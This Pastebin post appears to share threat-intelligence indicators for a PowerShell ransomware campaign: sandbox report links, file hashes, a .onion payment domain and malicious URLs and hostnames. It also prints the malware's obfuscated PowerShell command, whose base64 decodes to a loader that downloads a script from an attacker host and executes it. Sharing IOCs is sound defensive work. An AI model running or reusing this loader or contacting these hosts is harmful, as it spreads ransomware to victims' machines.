Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- PowerShell Ransomware IOCs:
- POWERSHELL:
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bfizxfa = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'Ozt0cnl7JGE9KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly9hd2ViLnRoZXNob3Rib2FyZC5pbmZvLz9wYWdlPXhpbmcmdmlkPWRjMTpsb2FkIik7aWV4ICRhO31jYXRjaHt9' ) );iex $bfizxfa;
- LINK:
- https://otx.alienvault.com/pulse/5d8c84e81ec4039d1b005284
- https://app.any.run/tasks/56d94552-d5e9-4f39-8d49-880bbf4d1c33/
- https://app.any.run/tasks/057ce45a-6984-4e84-a8bd-7d4edb55655c/
- https://brica.de/alerts/alert/public/1278245/powershell-ransomware-additional-iocs/
- https://www.hybrid-analysis.com/sample/420fff9fea54ba0d56ef73817564a41336cc275e4154cbf9d2885a251a37cf76/5d8c6f53038838659a3da869
- IOCS:
- domain qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion
- FileHash-SHA256 d0d14b35d575825bfdac071a9dc57b029f8b1ba65627f172ec8bdca6cce9f53c
- FileHash-SHA256 6be561d47a5e00773f5cea6a27db259046b71948cf01bc717598782f9b483e08
- FileHash-SHA256 420fff9fea54ba0d56ef73817564a41336cc275e4154cbf9d2885a251a37cf76
- URL http://home.tith.in/seven.sat
- URL http://cofee.theshotboard.net/juy6tghn
- URL http://aweb.theshotboard.info/
- URL http://cofee.theshotboard.net/?page=xing&vid=vb1:load2f15f6ca34bbb72198afececf9627cbdf838821e
- URL http://cofee.theshotboard.net/?need=uuid&vid=dc1:loadjs&
- URL http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$edwfxew
- hostname cofee.theshotboard.net
- hostname home.tith.in
- hostname aweb.theshotboard.info
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
